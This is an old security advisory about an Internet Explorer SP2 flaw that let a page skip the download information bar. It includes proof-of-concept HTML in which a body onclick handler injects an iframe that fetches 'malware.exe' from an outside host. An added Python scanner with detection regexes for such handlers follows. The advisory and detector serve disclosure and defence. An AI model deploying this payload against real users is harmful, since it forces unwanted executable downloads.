ieBarBypass.txt

16 Jan 2005 | Reported by Rafel Ivgi | Type: packetstorm | Source: packetstormsecurity.com

Remote file download bypass vulnerability in Internet Explorer can be exploited using dynamic elements.

Code
`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application: Internet Explorer  
Vendors: http://www.microsoft.com  
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158  
Patched With: SP2;  
Platforms: Windows  
Bug: Remote File Download Information Bar Bypass  
Exploitation: Remote with browser  
Date: 13 Jan 2005  
Author: Rafel Ivgi, The-Insider  
e-mail: [email protected]  
web: http://theinsider.deep-ice.com  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
1) Introduction  
2) Bugs  
3) The Code  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===============  
1) Introduction  
===============  
  
Internet Explorer is currently the most common internet browser in the world.  
Microsoft Windows XP Service Pack 2 was designed to block any file download  
with an information bar, which the user must click and then select "Download File".  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
======  
2) Bug  
======  
  
When trying to download a file with Microsoft Internet Explorer,  
the user gets the information bar. The information bar  
mechanism blocks/catches all references to downloadable files,  
even through JavaScript and HTML event properties.  
However, Microsoft's Internet Explorer (SP2) DOES NOT CATCH  
a "body" tag whose HTML "onclick" event dynamically  
creates "iframe" tags. For a good, more complicated dynamic  
object creation I used the "createElement" function.  
This way an attacker can make a user download a file by just  
clicking anywhere on the page (not on a hyperlink).  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
===========  
3) The Code  
===========  
  
Paste into an htm/html file and add "<" at the beginning of each line:  
------------------------ cut here --------------------------------------  
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->  
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>  
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">  
META http-equiv=Content-Type content="text/html; charset=windows-1252">  
META http-equiv=Content-Language content=en-us>  
META content=True name=HandheldFriendly>  
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>  
  
embed>  
body onclick='a=document.createElement("\<iframe src=\"http:\/  
  
\/theinsider.deep-  
  
ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild  
  
(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>  
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>  
/BODY></HTML>  
------------------------ cut here --------------------------------------  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
---   
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Scripts and Codes will make me D.O.S , but they will never HACK me."  
`
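
For defenders reviewing stored pages or proxy captures for the pattern described in section 2, the following is an added example, not part of the original advisory. It flags inline event handlers that build frame-like elements in script, and records whether the handler sits on a page-wide tag and which executable-looking URLs it references. The regexes, names and sample page are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristics chosen for this example; they are not a vendor signature.
FRAME_CREATE = re.compile(
    r"createElement\s*\(\s*[\"']\s*<?\s*(?:iframe|frame|embed|object)\b", re.I)
EXEC_URL = re.compile(
    r"https?://[^\s\"'<>]+?\.(?:exe|scr|pif|bat|cmd|msi|hta)(?=[\s\"'<>?#]|$)", re.I)
PAGE_WIDE = {"html", "body"}  # a handler here fires on a click anywhere


class HandlerScanner(HTMLParser):
    """Collects inline on* handlers that build frame-like elements in script."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not name.startswith("on") or not value:
                continue
            script = value.replace("\\", "")  # undo \< \/ \" style escaping
            if FRAME_CREATE.search(script):
                self.findings.append({
                    "line": self.getpos()[0], "tag": tag, "event": name,
                    "page_wide": tag in PAGE_WIDE,
                    "urls": EXEC_URL.findall(script),
                })


def scan(html_text):
    """Return one finding per inline handler that creates a frame element."""
    scanner = HandlerScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings


# Constructed sample input (example.invalid is a reserved, non-resolving name).
SAMPLE = r"""<html><head><title>constructed sample</title></head>
<body onclick='a=document.createElement("\<iframe src=\"http:\/\/downloads.example.invalid\/setup.exe\"\>\<\/iframe\>");document.body.appendChild(a)'>
<p onclick="toggleMenu()">menu</p>
<a href="http://downloads.example.invalid/setup.exe">Download</a>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `page_wide` set and a non-empty `urls` list matches the advisory's description most closely. The ordinary hyperlink in the sample is deliberately not flagged, since that path is the one the information bar already covers.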
